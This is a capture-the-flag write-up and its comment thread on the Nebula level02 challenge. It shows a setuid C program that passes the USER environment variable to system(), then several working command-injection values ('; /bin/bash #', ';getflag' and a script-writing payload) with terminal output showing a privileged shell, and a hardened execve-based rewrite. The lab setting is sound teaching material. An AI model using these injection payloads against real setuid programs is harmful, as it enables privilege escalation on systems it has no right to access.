#define _GNU_SOURCE   /* asprintf() and setres[ug]id() are GNU extensions */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;
  gid_t gid;
  uid_t uid;

  /* make the real and saved ids match the effective (setuid) ones */
  gid = getegid();
  uid = geteuid();
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  /* USER is read straight from the environment and pasted into a shell command line */
  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  system(buffer);
  return 0;
}
What I initially noticed here is that the "USER" variable is read directly from the environment. This makes it very similar to the previous challenge. I luckily got this one on my first try.
level02@nebula:/home/flag02$ USER='-e "#!/bin/bash\n/bin/bash" > /tmp/level02; chmod +x /tmp/level02; /tmp/level02'
level02@nebula:/home/flag02$ export USER
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo -e "#!/bin/bash\n/bin/bash" > /tmp/level02; chmod +x /tmp/level02; /tmp/level02 is cool")
flag02@nebula:/home/flag02$ getflag
You have successfully executed getflag on a target account
What we're doing here is injecting commands into the echo command line. As in the last challenge, the injected text writes a bash script to /tmp/level02 that ignores any arguments passed to it, marks it executable with chmod +x so it can actually be run, and then runs it.
Often in situations like this the bash script wouldn't be needed, but because the " is cool" follows the injected command, something has to absorb that trailing text. Running a script lets it be ignored as an unused argument, whereas passing it directly to /bin/bash would make bash try to execute it.
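As an added defender-side example (not code from the challenge or from this post), here is the same /bin/echo call written without system(): the USER value is checked against an allow-list and handed to execve as a single argv element, so the ';' and '>' in the injected string above are never parsed by a shell. The privilege-setting calls from the original are left out, and the function names are my own.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Allow-list check: a login name is [A-Za-z0-9._-] and must not start with
 * '-', so /bin/echo can never read it as an option such as "-e". */
int is_plain_username(const char *user)
{
    if (user == NULL || *user == '\0' || *user == '-') return 0;
    for (; *user; user++)
        if (!isalnum((unsigned char)*user) && !strchr("._-", *user))
            return 0;
    return 1;
}

/* Build argv for /bin/echo with `user` as ONE literal element. No shell ever
 * parses it, so ';', '>' and '"' stay inert. Returns argc, or 0 on error. */
int build_echo_argv(const char *user, char *argv[], int cap)
{
    if (user == NULL || cap < 5) return 0;
    argv[0] = "/bin/echo";
    argv[1] = (char *)user;
    argv[2] = "is";
    argv[3] = "cool";
    argv[4] = NULL;
    return 4;
}

/* Hardened replacement for the system() call: validate, then fork/execve with
 * a fixed argv and an empty environment. Returns echo's exit status, or -1. */
int run_echo(const char *user)
{
    char *argv[5];
    int status = 0;
    if (!is_plain_username(user) || build_echo_argv(user, argv, 5) == 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *envp[] = { NULL };   /* the child inherits no environment */
        execve(argv[0], argv, envp);
        _exit(127);
    }
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Calling run_echo(getenv("USER")) from main gives the original program's behaviour for a normal login name and a clean refusal for anything else.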
I'm guessing there may be an easier way than creating the bash script. Maybe a way to comment out the rest of the line? I'm not sure, but I know this method worked great for me.
Hello, good sir!
I beat the level as such:
USER=';getflag'
Then
./flag02
Which worked as expected
That works quite well too. I have always just been trying to get a full bash shell in my samples, as a personal goal. I've seen a few other people doing it similarly to you, getting it to call getflag directly. Both work. It's neat to see how people did them differently.
Hi there,
I've solved this level with:
USER="; /bin/bash #"
which gave me:
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo ; /bin/bash # is cool")
flag02@nebula:/home/flag02$ getflag
You have successfully executed getflag on a target account
Cheers!
Similar to you, I just ran:
export USER="Opening escalated shell...;bin/bash;echo Closing pwned shell, now that"
This gave me a full shell and some "cool" text when going in, and again after typing "exit" once I had run getflag.
I'm not sure why we were both using "export" for this level and the last; it seems unnecessary, since we only need the variable in this environment. Is there any reason you thought it was necessary to use?
That's just how I've "always done it". It may very well not be necessary.